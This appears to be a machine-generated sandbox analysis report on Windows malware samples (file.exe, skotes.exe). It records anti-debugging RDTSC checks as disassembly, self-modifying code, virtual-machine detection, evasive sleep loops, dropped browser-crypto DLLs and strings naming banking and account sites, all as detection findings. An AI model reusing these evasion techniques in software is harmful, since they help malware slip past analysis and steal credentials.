Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36418A second address: 36418E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36418E second address: 364192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36433C second address: 364340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 364340 second address: 364346 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 364AD3 second address: 364ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 364ADF second address: 364AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 364C55 second address: 364C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 364C59 second address: 364C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 364F33 second address: 364F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 365109 second address: 36510F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36520E second address: 365214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 365214 second address: 365224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F44646ECA46h 0x00000010 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36562C second address: 365632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3656D3 second address: 3656E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F44646ECA46h 0x00000011 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3656E4 second address: 3656ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 365FE9 second address: 36604F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e movsx esi, di 0x00000011 mov esi, ecx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F44646ECA48h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f xor dword ptr [ebp+122D2FCDh], eax 0x00000035 push 00000000h 0x00000037 call 00007F44646ECA4Bh 0x0000003c call 00007F44646ECA4Bh 0x00000041 clc 0x00000042 pop edi 0x00000043 pop edi 0x00000044 mov di, cx 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a jne 00007F44646ECA4Ch 0x00000050 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36604F second address: 36607D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F4465131BD9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 ja 00007F4465131BC6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3679D0 second address: 367A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F44646ECA4Ch 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F44646ECA4Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F44646ECA51h 0x00000019 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 367A06 second address: 367A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 367A0A second address: 367A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a sbb si, A2E2h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+12448CA4h], eax 0x00000017 mov dword ptr [ebp+122D27A0h], ebx 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F44646ECA4Fh 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 367A3E second address: 367A48 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 369A18 second address: 369A1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36A3F0 second address: 36A416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4465131BC6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F4465131BD0h 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F4465131BC6h 0x0000001b rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36A416 second address: 36A4A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b jmp 00007F44646ECA4Fh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F44646ECA48h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D1E6Ah] 0x00000032 mov edi, dword ptr [ebp+122D3015h] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F44646ECA48h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov dword ptr [ebp+12442E01h], edi 0x0000005a push eax 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36A4A0 second address: 36A4A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36683A second address: 36684A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 jne 00007F44646ECA4Eh 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36E8DC second address: 36E8E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36E8E2 second address: 36E938 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, dword ptr [ebp+122D38DEh] 0x00000015 je 00007F44646ECA47h 0x0000001b cld 0x0000001c push 00000000h 0x0000001e mov edi, dword ptr [ebp+122D3A9Ah] 0x00000024 push 00000000h 0x00000026 movsx edi, cx 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b jng 00007F44646ECA48h 0x00000031 push ebx 0x00000032 pop ebx 0x00000033 push eax 0x00000034 jmp 00007F44646ECA50h 0x00000039 pop eax 0x0000003a popad 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F44646ECA4Ch 0x00000044 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36F7FE second address: 36F861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F4465131BC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F4465131BC8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov edi, ebx 0x0000002f push 00000000h 0x00000031 mov edi, dword ptr [ebp+122D36F5h] 0x00000037 xchg eax, esi 0x00000038 jmp 00007F4465131BCBh 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007F4465131BD2h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3706EB second address: 3706EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3706EF second address: 37077A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4465131BD9h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F4465131BC8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+1246E408h] 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D351Eh], edi 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F4465131BC8h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 0000001Bh 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 mov dword ptr [ebp+122D1DBAh], ecx 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f pushad 0x00000060 jc 00007F4465131BC6h 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3727B4 second address: 3727E0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jl 00007F44646ECA66h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F44646ECA58h 0x00000019 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 37385E second address: 373862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 373862 second address: 373868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 378B55 second address: 378B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 37B95F second address: 37B966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 37DF75 second address: 37DF7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4465131BC6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36CB73 second address: 36CB80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36CB80 second address: 36CB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36EB42 second address: 36EB4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36EB4F second address: 36EB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 371836 second address: 371840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F44646ECA46h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 370A17 second address: 370A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007F4465131BC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F4465131BC8h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 371840 second address: 371844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 371844 second address: 37186E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007F4465131BEBh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4465131BD9h 0x00000016 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 37186E second address: 371872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 373A0D second address: 373A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 373A11 second address: 373A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 375A78 second address: 375A93 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4465131BCFh 0x00000011 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 379BC5 second address: 379BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 375A93 second address: 375A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 379BCB second address: 379BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 85FC98 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A06BC8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 85D17A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A0FBB9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A8EFC1 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Special instruction interceptor: First address: 1BECE9 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Special instruction interceptor: First address: 35BEA7 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Special instruction interceptor: First address: 37DFC2 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Special instruction interceptor: First address: 3E6BB1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 61ECE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7BBEA7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 7DDFC2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 846BB1 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Documents\JDGIECGIEB.exe

Code function: 16_2_04B20CA1 rdtsc

16_2_04B20CA1

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1012962001\931e3b56d4.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 7644	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7620	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7620	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7616	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7616	Thread sleep time: -86043s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7720	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7624	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7624	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7640	Thread sleep time: -52026s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6052	Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6052	Thread sleep time: -1590000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6052	Thread sleep time: -30000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\JDGIECGIEB.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB4EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6CB4EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000012.00000002.2063321615.000000000079B000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000014.00000002.2645365146.000000000079B000.00000040.00000001.01000000.0000000E.sdmp, file.exe	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: BGCAFHCA.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: BGCAFHCA.0.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: file.exe, 00000000.00000002.1979370069.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:cuI
Source: BGCAFHCA.0.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: BGCAFHCA.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: BGCAFHCA.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: BGCAFHCA.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: BGCAFHCA.0.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
